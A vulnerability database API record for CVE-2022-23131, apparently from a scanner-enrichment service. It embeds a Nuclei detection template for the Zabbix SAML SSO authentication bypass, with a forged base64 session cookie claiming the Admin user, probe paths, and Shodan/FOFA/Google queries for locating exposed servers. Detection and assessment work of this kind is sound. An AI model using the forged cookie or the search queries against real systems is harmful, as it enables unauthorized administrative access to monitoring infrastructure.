{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2022-23131/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2022-23131/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2022-23131/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2022-23131/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2022-23131/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2022-23131"},"sightings":{"href":"/api/v1/sightings/cve-2022-23131"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2022/CVE-2022-23131.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2022-23131\n\ninfo:\n  name: Zabbix - SAML SSO Authentication Bypass\n  author: For3stCo1d,spac3wh1te\n  severity: critical\n  description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix monitoring system.\n  remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.\n  reference:\n    - https://support.zabbix.com/browse/ZBX-20350\n    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-23131\n    - https://github.com/1mxml/CVE-2022-23131\n    - https://github.com/20142995/sectool\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-23131\n    cwe-id: CWE-290\n    epss-score: 0.95683\n    epss-percentile: 0.99871\n    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: zabbix\n    product: zabbix\n    shodan-query:\n      - http.favicon.hash:892542951\n      - http.title:\"zabbix-server\"\n      - cpe:\"cpe:2.3:a:zabbix:zabbix\"\n    fofa-query:\n      - app=\"ZABBIX-监控系统\" && body=\"saml\"\n      - icon_hash=892542951\n      - app=\"zabbix-监控系统\" && body=\"saml\"\n      - title=\"zabbix-server\"\n    google-query: intitle:\"zabbix-server\"\n  tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/zabbix/index_sso.php\"\n      - \"{{BaseURL}}/index_sso.php\"\n\n    stop-at-first-match: true\n\n    headers:\n      Cookie: \"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9\"\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(tolower(header), 'location: zabbix.php?action=dashboard.view')\"\n\n      - type: status\n        status:\n          - 302\n# digest: 4b0a00483046022100b6ba8110e08bfb62936e00309b500700341bfb27a502bbdfd4a9fc443c0dae19022100a5e2d563b9442ccabb5a9183bdb10ad4b37f460d1e80f92efd404d3ec7052d59:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2022-23131"}